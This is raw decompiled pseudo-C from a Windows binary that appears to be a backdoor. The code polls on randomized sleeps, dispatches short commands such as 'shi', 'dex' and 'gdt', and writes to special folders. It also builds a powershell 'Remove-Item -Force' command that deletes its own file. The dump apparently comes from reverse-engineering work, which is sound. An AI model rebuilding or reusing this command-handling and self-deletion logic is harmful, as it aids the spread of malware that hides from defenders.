                				if (_t1812 + 0x10 != _t1920) goto 0xc805ac60;
                				r12d =  *(_t1824 + 0x9d0);
                				r13d = 3;
                				goto 0xc805b0da;
                				r14d = 0;
                				if (r12d != 1) goto 0xc805b7f0;
                				if (_t1822 != _t1925) goto 0xc805b201;
                				r8d = E00000285285C80CAB54(_t1327 >> 3 >> 0x3f);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t996 = r8d * 0x3e8;
                				Sleep(??);
                				if ( *(_t1824 + 0x108) == 0) goto 0xc805b12f;
                				E00000285285C805C610((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f),  *(_t1824 + 0x108));
                				0xc80caea4();
                				E00000285285C80C51EC(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1822);
                				_t1333 =  *((intOrPtr*)(_t1824 - 0x58));
                				r15d = 0x1000;
                				if (_t1333 - 0x10 < 0) goto 0xc805b1a0;
                				_t1522 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1333 + 1 - _t1925 < 0) goto 0xc805b19b;
                				if ((_t996 & 0x0000001f) != 0) goto 0xc805b9a4;
                				_t1335 =  *((intOrPtr*)(_t1522 - 8));
                				if (_t1335 - _t1522 >= 0) goto 0xc805b99e;
                				_t1523 = _t1522 - _t1335;
                				if (_t1523 - 8 < 0) goto 0xc805b998;
                				if (_t1523 - 0x27 > 0) goto 0xc805b992;
                				0xc80c51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1920;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1336 =  *(_t1824 - 0x78);
                				if (_t1336 - 0x10 < 0) goto 0xc805a86f;
                				_t1525 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1336 + 1 - _t1925 < 0) goto 0xc805a86a;
                				if ((_t996 & 0x0000001f) != 0) goto 0xc805b9bc;
                				_t1338 =  *((intOrPtr*)(_t1525 - 8));
                				if (_t1338 - _t1525 >= 0) goto 0xc805b9b6;
                				_t1526 = _t1525 - _t1338;
                				if (_t1526 - 8 < 0) goto 0xc805b9b0;
                				if (_t1526 - 0x27 > 0) goto 0xc805b9aa;
                				goto 0xc805a867;
                				r12d = 0;
                				_t450 = _t1824 + 0x98; // 0x9b
                				E00000285285C8056430(__esp, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t450, _t1822 + 0x28);
                				_t1816 =  *((intOrPtr*)(_t1822 + 0x18));
                				if (_t1816 - 0x10 < 0) goto 0xc805b230;
                				goto 0xc805b233;
                				_t1382 =  *((intOrPtr*)(_t1822 + 0x10));
                				_t1867 =  <  ? _t1382 : _t1917;
                				_t1173 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b25b;
                				if (E00000285285C80C9A30(_t996, _t1822, "shi",  <  ? _t1382 : _t1917) != 0) goto 0xc805b30e;
                				if (_t1382 != 3) goto 0xc805b30e;
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t996, 0, _t1042, __esp, 0xc81530b0, "shi", _t1816,  <  ? _t1382 : _t1917);
                				E00000285285C80CAB54(_t1338);
                				r9d = 0;
                				_t459 = _t1900 + 0x26; // 0x26
                				r8d = _t459;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				 *((long long*)(_t1824 + 0x1f0)) = _t1338;
                				 *((long long*)(_t1824 + 0x1f8)) = _t1338;
                				 *((long long*)(_t1824 + 0x200)) = _t1338;
                				_t465 = _t1824 + 0x1f0; // 0x1f3
                				E00000285285C8097750(_t1338, _t1382, _t465, _t1816, _t1822, _t1900);
                				if ( *((intOrPtr*)(_t1824 + 0x200)) == 0) goto 0xc805b270;
                				_t467 = _t1824 + 0x98; // 0x9b
                				E00000285285C8057AE0(_t1338,  *((intOrPtr*)(_t1824 + 0x1f0)),  *((intOrPtr*)(_t1824 + 0x1f8)), _t467, _t1917);
                				goto 0xc805b3ee;
                				if (_t1816 - 0x10 < 0) goto 0xc805b319;
                				goto 0xc805b31c;
                				_t1870 =  <  ? _t1382 : _t1917;
                				_t1179 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b340;
                				if (E00000285285C80C9A30(0, _t1822, "dij",  <  ? _t1382 : _t1917) != 0) goto 0xc805b40b;
                				if (_t1382 != 3) goto 0xc805b40b;
                				r8d = 0x208;
                				E00000285285C80C8EF0(0, 0, _t1042, __esp, 0xc81530b0, "dij", _t1816,  <  ? _t1382 : _t1917);
                				_t845 = E00000285285C80CAB54(_t1338);
                				r9d = 0;
                				_t476 = _t1900 + 0x26; // 0x26
                				r8d = _t476;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				 *((long long*)(_t1824 + 0x208)) = _t1338;
                				 *((long long*)(_t1824 + 0x210)) = _t1338;
                				 *((long long*)(_t1824 + 0x218)) = _t1338;
                				_t482 = _t1824 + 0x208; // 0x20b
                				E00000285285C8097750(_t1338, _t1382, _t482, _t1816, _t1822, _t1900);
                				if ( *((intOrPtr*)(_t1824 + 0x218)) == 0) goto 0xc805b351;
                				_t485 = _t1824 + 0x98; // 0x9b
                				_t851 = E00000285285C8057CB0(_t1382,  *((intOrPtr*)(_t1824 + 0x208)),  *((intOrPtr*)(_t1824 + 0x210)), _t1822, _t1824, _t485, _t1822 + 0x48);
                				r12d = 0;
                				if (_t851 == 0) goto 0xc805b796;
                				 *(_t1822 + 0x88) = 1;
                				goto 0xc805b796;
                				if (_t1816 - 0x10 < 0) goto 0xc805b416;
                				goto 0xc805b419;
                				_t1873 =  <  ? _t1382 : _t1917;
                				_t1186 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b439;
                				if (E00000285285C80C9A30(0, _t1822, "dex",  <  ? _t1382 : _t1917) != 0) goto 0xc805b4b6;
                				if (_t1382 != 3) goto 0xc805b4b6;
                				r9d = 0;
                				r8d = _t1382 + 0x19;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				_t490 = _t1824 + 0x98; // 0x9b
                				_t1763 =  >=  ?  *((void*)(_t1824 + 0x98)) : _t490;
                				r8d =  *(_t1824 + 0xa8);
                				if (E00000285285C809A9C8(_t1338, _t1382, 0xc81530b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490, _t1822, _t1822 + 0x48) == 0) goto 0xc805b796;
                				E00000285285C809B510(_t854, 1, _t1382, 0xc81530b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490);
                				 *(_t1822 + 0x88) = 1;
                				goto 0xc805b796;
                				if (_t1816 - 0x10 < 0) goto 0xc805b4c1;
                				goto 0xc805b4c4;
                				_t1875 =  <  ? _t1382 : _t1917;
                				_t1193 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b4e4;
                				if (E00000285285C80C9A30(0, _t1822, "sdl",  <  ? _t1382 : _t1917) != 0) goto 0xc805b501;
                				if (_t1382 - 3 >= 0) goto 0xc805b4ef;
                				goto 0xc805b4f9;
                				if ((r12d & 0xffffff00 | _t1382 - 0x00000003 > 0x00000000) == 0) goto 0xc805bb86;
                				if (E00000285285C8057E00(_t1382, _t1822, "ins") == 0) goto 0xc805b56b;
                				if ( *(_t1824 + 0x9c8) == 0) goto 0xc805b52c;
                				0xc8059d60();
                				goto 0xc805b796;
                				 *(_t1826 + 0x20) = 0;
                				_t499 = _t1824 + 0x150; // 0x153
                				_t500 = _t1824 + 0x1b0; // 0x1b3
                				_t501 = _t1824 + 0x4f8; // 0x4fb
                				_t502 = _t1824 + 0x298; // 0x29b
                				if (E00000285285C8057ED0(_t845 - "dij" + "dij" * 2, 0xe1, _t1382, _t502, _t501, _t1816, _t1822, _t500, _t499, 0xc810af30) != 0) goto 0xc805b9c2;
                				0xc8059d60();
                				goto 0xc805b796;
                				if (E00000285285C8057E00(_t1382, _t1822, "gdt") == 0) goto 0xc805b796;
                				_t503 = _t1824 + 0x5b0; // 0x5b3
                				E00000285285C80568F0(_t503, "\r", _t500);
                				_t504 = _t1824 + 0x630; // 0x633
                				E00000285285C80568F0(_t504, 0xc810cf6e, _t500);
                				_t505 = _t1824 + 0x98; // 0x9b
                				_t506 = _t1824 + 0x5b0; // 0x5b3
                				_t507 = _t1824 + 0x630; // 0x633
                				_t865 = E00000285285C80980C0(_t1338, _t1382, _t507, _t506, _t1822, _t1824, _t505, 0xc810af30, _t1917, _t1925);
                				_t508 = _t1824 + 0x630; // 0x633
                				_t866 = E00000285285C8056820(_t865, 0, _t508);
                				_t509 = _t1824 + 0x5b0; // 0x5b3
                				E00000285285C8056820(_t866, 0, _t509);
                				r8b = 0xa;
                				_t510 = _t1824 + 0x98; // 0x9b
                				_t511 = _t1824 + 0x338; // 0x33b
                				_t868 = E00000285285C809802C(_t1382, _t511, _t510);
                				_t512 = _t1824 + 8; // 0xb
                				_t869 = E00000285285C8056930(_t868, _t512);
                				_t1383 =  *((intOrPtr*)(_t1824 + 0x338));
                				_t1817 =  *((intOrPtr*)(_t1824 + 0x340));
                				if (_t1383 == _t1817) goto 0xc805b778;
                				asm("o16 nop [eax+eax]");
                				_t515 = _t1824 + 0x350; // 0x353
                				_t870 = E00000285285C8056930(_t869, _t515);
                				_t516 = _t1824 + 0x2f8; // 0x2fb
                				E00000285285C8056930(_t870, _t516);
                				_t517 = _t1824 + 0x5f0; // 0x5f3
                				E00000285285C80568F0(_t517, 0xc810cf6e, _t505);
                				_t518 = _t1824 + 0x5d0; // 0x5d3
                				E00000285285C80568F0(_t518, 0xc810cf6e, _t505);
                				_t519 = _t1824 + 0x2f8; // 0x2fb
                				 *(_t1826 + 0x20) = _t519;
                				_t521 = _t1824 + 0x350; // 0x353
                				_t522 = _t1824 + 0x5f0; // 0x5f3
                				_t523 = _t1824 + 0x5d0; // 0x5d3
                				r14b = E00000285285C808A9E0(_t845 - "dij" + "dij" * 2, 0, 0xe1, _t1042, 1, _t1383 - _t1817, _t1383, _t1383, _t523, _t1817, _t1822, _t1824, _t522, _t521, _t1920) == 0;
                				_t524 = _t1824 + 0x5d0; // 0x5d3
                				_t875 = E00000285285C8056820(_t874, 0, _t524);
                				_t525 = _t1824 + 0x5f0; // 0x5f3
                				E00000285285C8056820(_t875, 0, _t525);
                				if (r14b == 0) goto 0xc805b710;
                				if ( *((long long*)(_t1824 + 0x360)) == 0) goto 0xc805b710;
                				_t527 = _t1824 + 0x518; // 0x51b
                				E00000285285C80593D0(_t1383, _t527, "Command : ", _t1822, _t1824, _t1383, _t521);
                				_t528 = _t1824 + 8; // 0xb
                				_t878 = E00000285285C80588F0(0, _t1383, _t528, _t519, _t521);
                				_t529 = _t1824 + 0x518; // 0x51b
                				E00000285285C8056820(_t878, 0, _t529);
                				_t530 = _t1824 + 8; // 0xb
                				E00000285285C8056730(0xa, _t1383, _t530, _t1817);
                				_t531 = _t1824 + 0x350; // 0x353
                				_t532 = _t1824 + 8; // 0xb
                				E00000285285C80588F0(0, _t1383, _t532, _t531, _t521);
                				_t533 = _t1824 + 8; // 0xb
                				_t882 = E00000285285C8056730(0xa, _t1383, _t533, _t1817);
                				_t534 = _t1824 + 0x2f8; // 0x2fb
                				_t883 = E00000285285C8056820(_t882, 0, _t534);
                				_t535 = _t1824 + 0x350; // 0x353
                				_t884 = E00000285285C8056820(_t883, 0, _t535);
                				_t1384 = _t1383 + 0x20;
                				if (_t1383 + 0x20 != _t1817) goto 0xc805b620;
                				_t536 = _t1824 + 8; // 0xb
                				E00000285285C8057DF0(_t884, _t536);
                				r8d =  *(_t1824 + 0x18);
                				_t538 = _t1824 + 0x318; // 0x31b
                				E00000285285C8056200(__esp, _t519, _t1383 + 0x20, _t538, _t519);
                				_t887 = E00000285285C8058900(0, _t1383 + 0x20, _t1822 + 0x68, _t519);
                				_t540 = _t1824 + 0x318; // 0x31b
                				_t888 = E00000285285C8056820(_t887, 0, _t540);
                				 *(_t1822 + 0x88) = 1;
                				goto 0xc805b77f;
                				 *(_t1822 + 0x88) = r13d;
                				_t543 = _t1824 + 8; // 0xb
                				E00000285285C8056820(_t888, 0, _t543);
                				_t544 = _t1824 + 0x338; // 0x33b
                				_t890 = E00000285285C8057440(_t519, _t1383 + 0x20, _t544, _t1822);
                				_t545 = _t1824 + 0x98; // 0x9b
                				E00000285285C8056820(_t890, 0, _t545);
                				_t1823 = _t1822 + 0x90;
                				if (_t1823 != _t1925) goto 0xc805b210;
                				0xc8059d60();
                				_t546 = _t1824 + 0xf0; // 0xf3
                				_t892 = E00000285285C805C460(_t546);
                				_t547 = _t1824 - 0x70; // -109
                				E00000285285C8056820(E00000285285C8056820(_t892, 0, _t547), 0, _t1826 + 0x70);
                				r14d = 0;
                				r15d = 0x1000;
                				goto 0xc805a6ad;
                				r8d = E00000285285C80CAB54(_t519);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t1003 = r8d * 0x3e8;
                				Sleep(??);
                				if ( *(_t1824 + 0x108) == 0) goto 0xc805b82f;
                				E00000285285C805C610(_t1383 + 0x20,  *(_t1824 + 0x108));
                				0xc80caea4();
                				E00000285285C80C51EC(_t519, _t1383 + 0x20, _t1823);
                				_t1340 =  *((intOrPtr*)(_t1824 - 0x58));
                				r15d = 0x1000;
                				if (_t1340 - 0x10 < 0) goto 0xc805b8a0;
                				_t1583 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1340 + 1 - _t1925 < 0) goto 0xc805b89b;
                				if ((_t1003 & 0x0000001f) != 0) goto 0xc805c08d;
                				_t1342 =  *((intOrPtr*)(_t1583 - 8));
                				if (_t1342 - _t1583 >= 0) goto 0xc805c087;
                				_t1584 = _t1583 - _t1342;
                				if (_t1584 - 8 < 0) goto 0xc805c081;
                				if (_t1584 - 0x27 > 0) goto 0xc805c07b;
                				0xc80c51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1920;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1343 =  *(_t1824 - 0x78);
                				if (_t1343 - 0x10 < 0) goto 0xc805a86f;
                				_t1586 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1343 + 1 - _t1925 < 0) goto 0xc805a86a;
                				if ((_t1003 & 0x0000001f) != 0) goto 0xc805c0a5;
                				_t1345 =  *((intOrPtr*)(_t1586 - 8));
                				if (_t1345 - _t1586 >= 0) goto 0xc805c09f;
                				_t1587 = _t1586 - _t1345;
                				if (_t1587 - 8 < 0) goto 0xc805c099;
                				if (_t1587 - 0x27 > 0) goto 0xc805c093;
                				goto 0xc805a867;
                				r8d = E00000285285C80CAB54(_t1345);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t1005 = r8d * 0x3e8;
                				Sleep(??);
                				goto 0xc805a6c0;
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				_t574 = _t1824 + 0x170; // 0x173
                				E00000285285C805C440(_t1345, _t574);
                				r13d =  ==  ? 1 : r13d;
                				 *(_t1823 + 0x88) = r13d;
                				_t576 = _t1824 + 0x170; // 0x173
                				E00000285285C805C310(1, _t1383 + 0x20, _t576, _t1823);
                				_t577 = _t1824 + 0x170; // 0x173
                				_t1346 = _t577;
                				 *(_t1826 + 0x20) = _t1346;
                				_t579 = _t1824 + 0x220; // 0x223
                				_t580 = _t1824 + 0x190; // 0x193
                				_t581 = _t1824 + 0x1d0; // 0x1d3
                				_t582 = _t1824 + 0x2b8; // 0x2bb
                				_t906 = E00000285285C8093D60(_t1346, _t1383 + 0x20, _t582, _t581, _t580, _t579);
                				_t583 = _t1824 + 0xd0; // 0xd3
                				E00000285285C805C300(_t906, _t583,  *0xc81530a8);
                				_t584 = _t1346 + 0x20; // 0x20
                				 *(_t1826 + 0x20) = _t1826 + 0x50;
                				_t587 = _t1824 + 0x2b8; // 0x2bb
                				_t588 = _t1824 + 0x318; // 0x31b
                				_t908 = E00000285285C806A7F0(_t1005, 0x28c1979 * r8d >> 0x20 >> 1, _t1042, 1, 0x28c1979 * r8d >> 0x20 >> 1 - 3, _t1383 + 0x20, _t588, _t1346, _t1817, _t1823, _t1824, _t584, _t587, _t1912);
                				_t589 = _t1824 + 0x318; // 0x31b
                				E00000285285C8056820(_t908, _t1005, _t589);
                				_t591 = _t1824 + 0x610; // 0x613
                				E00000285285C8057760(_t1346, _t591, _t587);
                				_t592 = _t1824 + 0x278; // 0x27b
                				E00000285285C80568F0(_t592, "powershell", _t584);
                				GetCurrentProcessId();
                				_t593 = _t1824 + 0x518; // 0x51b
                				E00000285285C8059D20(_t593);
                				_t594 = _t1824 + 0x318; // 0x31b
                				E00000285285C805CA20(_t1346, _t594, _t1346);
                				_t595 = _t1824 + 0x278; // 0x27b
                				_t915 = E00000285285C80588F0(_t1005, _t1383 + 0x20, _t595, _t1346, _t587);
                				_t596 = _t1824 + 0x318; // 0x31b
                				_t916 = E00000285285C8056820(_t915, _t1005, _t596);
                				_t597 = _t1824 + 0x518; // 0x51b
                				_t917 = E00000285285C8056820(_t916, _t1005, _t597);
                				_t598 = _t1824 + 0x278; // 0x27b
                				E00000285285C80588D0(_t917, _t1005, _t1346, _t1383 + 0x20, _t598, "; Remove-Item -Path \"", _t1346, _t587);
                				_t599 = _t1824 + 0x610; // 0x613
                				_t600 = _t1824 + 0x278; // 0x27b
                				_t919 = E00000285285C80588F0(_t1005, _t1383 + 0x20, _t600, _t599, _t587);
                				_t601 = _t1824 + 0x278; // 0x27b
                				_t920 = E00000285285C80588D0(_t919, _t1005, _t1346, _t1384, _t601, "\" -Force", _t1346, _t587);
                				_t602 = _t1824 + 0x278; // 0x27b
                				_t921 = E00000285285C80588D0(_t920, _t1005, _t1346, _t1384, _t602, "\"", _t1346, _t587);
                				_t603 = _t1824 + 0x278; // 0x27b
                				E00000285285C809B510(E00000285285C8057DF0(_t921, _t603), 1, _t1384, _t1346, "\"");
                				__imp__CoUninitialize();
                				_t924 = TerminateThread(??, ??);
                				_t604 = _t1824 + 0x278; // 0x27b
                				_t925 = E00000285285C8056820(_t924, _t1005, _t604);
                				_t605 = _t1824 + 0x610; // 0x613
                				_t926 = E00000285285C8056820(_t925, _t1005, _t605);
                				_t606 = _t1824 + 0x2b8; // 0x2bb
                				E00000285285C8056820(_t926, _t1005, _t606);
                				_t607 = _t1824 + 0x170; // 0x173
                				E00000285285C805C3D0(_t607);
                				goto 0xc805bfa7;
                				_t982 =  *(_t1824 + 0x9c8) & 0x000000ff;
                				if (_t982 == 0) goto 0xc805bbb9;
                				 *(_t1826 + 0x20) = 1;
                				_t610 = _t1824 + 0x150; // 0x153
                				_t611 = _t1824 + 0x1b0; // 0x1b3
                				_t612 = _t1824 + 0x4f8; // 0x4fb
                				_t613 = _t1824 + 0x298; // 0x29b
                				E00000285285C8057ED0(_t982, 0, _t1384, _t613, _t612, _t1817, _t1823, _t611, _t610, 0xc810af30);
                				goto 0xc805bbd3;
                				r8d = 0;
                				_t614 = _t1824 + 0x240; // 0x243
                				_t615 = _t1824 + 0x1b0; // 0x1b3
                				E00000285285C8056C40(_t1384, _t615, _t614, _t1817, _t1823, _t611, _t610 | 0xffffffff);
                				 *(_t1824 - 0x40) = 0xc810af30;
                				 *(_t1824 - 0x38) = 0xc810af30;
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = 0xc810af30;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				r8d = 0xa;
                				_t621 = _t1824 - 0x50; // -77
                				E00000285285C8056B10(_t1384, _t621, "powershell", _t1823, _t611);
                				_t932 = GetCurrentProcessId();
                				_t622 = _t1824 + 0x170; // 0x173
                				E00000285285C8059D20(_t622);
                				_t623 = _t1824 + 8; // 0xb
                				E00000285285C805CA20(_t1346, _t623, _t1346);
                				r8d = r8d ^ r8d;
                				_t624 = _t1824 - 0x50; // -77
                				E00000285285C8058D60(_t1384, _t624, _t1346, _t1817, _t1823, _t1824, _t1346, _t610 | 0xffffffffffffffff);
                				_t1347 =  *((intOrPtr*)(_t1824 + 0x20));
                				if (_t1347 - 0x10 < 0) goto 0xc805bc90;
                				_t1619 =  *((intOrPtr*)(_t1824 + 8));
                				if (_t1347 + 1 - _t1817 < 0) goto 0xc805bc8b;
                				if ((_t1005 & 0x0000001f) == 0) goto 0xc805bc5e;
                				0xc80caadc();
                				asm("int3");
                				_t1349 =  *((intOrPtr*)(_t1619 - 8));
                				if (_t1349 - _t1619 < 0) goto 0xc805bc6d;
                				0xc80caadc();
                				asm("int3");
                				_t1620 = _t1619 - _t1349;
                				if (_t1620 - 8 >= 0) goto 0xc805bc7c;
                				0xc80caadc();
                				asm("int3");
                				if (_t1620 - 0x27 <= 0) goto 0xc805bc88;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *((long long*)(_t1824 + 0x20)) = 0xf;
                				 *(_t1824 + 0x18) = 0xc810af30;
                				 *((char*)(_t1824 + 8)) = 0;
                				_t1350 =  *((intOrPtr*)(_t1824 + 0x188));
                				if (_t1350 - 0x10 < 0) goto 0xc805bcf9;
                				_t1622 =  *((intOrPtr*)(_t1824 + 0x170));
                				if (_t1350 + 1 - _t1817 < 0) goto 0xc805bcf4;
                				if ((_t1005 & 0x0000001f) == 0) goto 0xc805bcc7;
                				0xc80caadc();
                				asm("int3");
                				_t1352 =  *((intOrPtr*)(_t1622 - 8));
                				if (_t1352 - _t1622 < 0) goto 0xc805bcd6;
                				0xc80caadc();
                				asm("int3");
                				_t1623 = _t1622 - _t1352;
                				if (_t1623 - 8 >= 0) goto 0xc805bce5;
                				0xc80caadc();
                				asm("int3");
                				if (_t1623 - 0x27 <= 0) goto 0xc805bcf1;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *((long long*)(_t1824 + 0x188)) = 0xf;
                				 *((long long*)(_t1824 + 0x180)) = 0xc810af30;
                				 *((char*)(_t1824 + 0x170)) = 0;
                				r8d = 0x15;
                				_t641 = _t1824 - 0x50; // -77
                				E00000285285C8058C10(_t1384, _t641, "; Remove-Item -Path \"", _t1817, _t1824, _t1346);
                				r8d = 0;
                				_t642 = _t1824 + 0x1b0; // 0x1b3
                				_t643 = _t1824 - 0x50; // -77
                				E00000285285C8058D60(_t1384, _t643, _t642, _t1817, _t1823, _t1824, _t1346, _t610 | 0xffffffffffffffff);
                				r8d = 8;
                				_t644 = _t1824 - 0x50; // -77
                				E00000285285C8058C10(_t1384, _t644, "\" -Force", _t1817, _t1824, _t1346);
                				_t645 = _t1824 - 0x50; // -77
                				if (_t982 == 0) goto 0xc805bd6c;
                				r8d = 0xa;
                				goto 0xc805bd79;
                				r8d = 1;
                				E00000285285C8058C10(_t1384, _t645, "\"", _t1817, _t1824, _t1346);
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0xb8], xmm0");
                				 *((long long*)(_t1824 + 0xc8)) = 0xc810af30;
                				 *(_t1823 + 0x88) = 1;
                				_t648 = _t1824 + 0xb8; // 0xbb
                				E00000285285C805C310(1, _t1384, _t648, _t1823);
                				_t649 = _t1824 + 0xb8; // 0xbb
                				 *(_t1826 + 0x20) = _t649;
                				_t651 = _t1824 + 0x220; // 0x223
                				_t652 = _t1824 + 0x190; // 0x193
                				_t653 = _t1824 + 0x1d0; // 0x1d3
                				_t654 = _t1824 - 0x18; // -21
                				E00000285285C8093D60(_t649, _t1384, _t654, _t653, _t652, _t651);
                				 *(_t1826 + 0x20) = _t1826 + 0x50;
                				_t659 = _t1824 - 0x18; // -21
                				_t660 = _t1824 + 0x2f8; // 0x2fb
                				_t943 = E00000285285C806A7F0(_t1005, _t932, 0x1000, 1, _t982, _t1384, _t660, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), _t1817, _t1823, _t1824, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t659, _t1912);
                				_t1355 =  *((intOrPtr*)(_t1824 + 0x310));
                				if (_t1355 - 0x10 < 0) goto 0xc805be5e;
                				_t1632 =  *((intOrPtr*)(_t1824 + 0x2f8));
                				if (_t1355 + 1 - _t1817 < 0) goto 0xc805be59;
                				if ((_t1005 & 0x0000001f) == 0) goto 0xc805be2c;
                				0xc80caadc();
                				asm("int3");
                				_t1357 =  *((intOrPtr*)(_t1632 - 8));
                				if (_t1357 - _t1632 < 0) goto 0xc805be3b;
                				0xc80caadc();
                				asm("int3");
                				_t1633 = _t1632 - _t1357;
                				if (_t1633 - 8 >= 0) goto 0xc805be4a;
                				0xc80caadc();
                				asm("int3");
                				if (_t1633 - 0x27 <= 0) goto 0xc805be56;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				_t666 = _t1824 - 0x50; // -77
                				_t1636 =  >=  ?  *((void*)(_t1824 - 0x50)) : _t666;
                				E00000285285C809B510(_t943, 1, _t1384,  >=  ?  *((void*)(_t1824 - 0x50)) : _t666, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)));
                				__imp__CoUninitialize();
                				TerminateThread(??, ??);
                				_t1358 =  *_t1824;
                				if (_t1358 - 0x10 < 0) goto 0xc805beda;
                				_t1638 =  *((intOrPtr*)(_t1824 - 0x18));
                				if (_t1358 + 1 - _t1817 < 0) goto 0xc805bed5;
                				if ((_t1005 & 0x0000001f) == 0) goto 0xc805bea8;
                				0xc80caadc();
                				asm("int3");
                				_t1360 =  *((intOrPtr*)(_t1638 - 8));
                				if (_t1360 - _t1638 < 0) goto 0xc805beb7;
                				0xc80caadc();
                				asm("int3");
                				_t1639 = _t1638 - _t1360;
                				if (_t1639 - 8 >= 0) goto 0xc805bec6;
                				0xc80caadc();
                				asm("int3");
                				if (_t1639 - 0x27 <= 0) goto 0xc805bed2;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *_t1824 = 0xf;
                				 *(_t1824 - 8) = 0xc810af30;
                				 *((char*)(_t1824 - 0x18)) = 0;
                				if ( *((intOrPtr*)(_t1824 + 0xb8)) == 0) goto 0xc805bf44;
                				_t948 = E00000285285C805C690(E00000285285C805CA80( *((intOrPtr*)(_t1824 + 0xb8)),  *((intOrPtr*)(_t1824 + 0xb8)),  *(_t1824 + 0xc0), ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20) * ( *((intOrPtr*)(_t1824 + 0xc8)) -  *((intOrPtr*)(_t1824 + 0xb8))) >> 0x20,  *((intOrPtr*)(_t1824 + 0xb8)),  *((intOrPtr*)(_t1824 + 0xb8)), _t1823, ( *(_t1824 + 0xc0) >> 3 >> 0x3f) + ( *(_t1824 + 0xc0) >> 3));
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0xb8], xmm0");
                				 *((long long*)(_t1824 + 0xc8)) = 0xc810af30;
                				_t1362 =  *(_t1824 - 0x38);
                				if (_t1362 - 0x10 < 0) goto 0xc805bf97;
                				_t1644 =  *((intOrPtr*)(_t1824 - 0x50));
                				if (_t1362 + 1 - _t1817 < 0) goto 0xc805bf92;
                				if ((_t1005 & 0x0000001f) == 0) goto 0xc805bf65;
                				0xc80caadc();
                				asm("int3");
                				_t1364 =  *((intOrPtr*)(_t1644 - 8));
                				if (_t1364 - _t1644 < 0) goto 0xc805bf74;
                				0xc80caadc();
                				asm("int3");
                				_t1645 = _t1644 - _t1364;
                				if (_t1645 - 8 >= 0) goto 0xc805bf83;
                				0xc80caadc();
                				asm("int3");
                				if (_t1645 - 0x27 <= 0) goto 0xc805bf8f;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = 0xc810af30;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				_t691 = _t1824 + 0x98; // 0x9b
                				E00000285285C8056820(_t948, _t1005, _t691);
                				_t692 = _t1824 + 0xf0; // 0xf3
                				_t950 = E00000285285C805C460(_t692);
                				_t693 = _t1824 - 0x70; // -109
                				E00000285285C8056820(E00000285285C8056820(_t950, _t1005, _t693), _t1005, _t1826 + 0x70);
                				_t695 = _t1824 - 0x30; // -45
                				_t953 = E00000285285C805C3D0(_t695);
                				_t696 = _t1824 + 0x240; // 0x243
                				_t954 = E00000285285C8056820(_t953, _t1005, _t696);
                				_t697 = _t1824 + 0x4d8; // 0x4db
                				_t955 = E00000285285C8056820(_t954, _t1005, _t697);
                				_t698 = _t1824 + 0x220; // 0x223
                				_t956 = E00000285285C8056820(_t955, _t1005, _t698);
                				_t699 = _t1824 + 0x4f8; // 0x4fb
                				_t957 = E00000285285C8056820(_t956, _t1005, _t699);
                				_t700 = _t1824 + 0x298; // 0x29b
                				_t958 = E00000285285C8056820(_t957, _t1005, _t700);
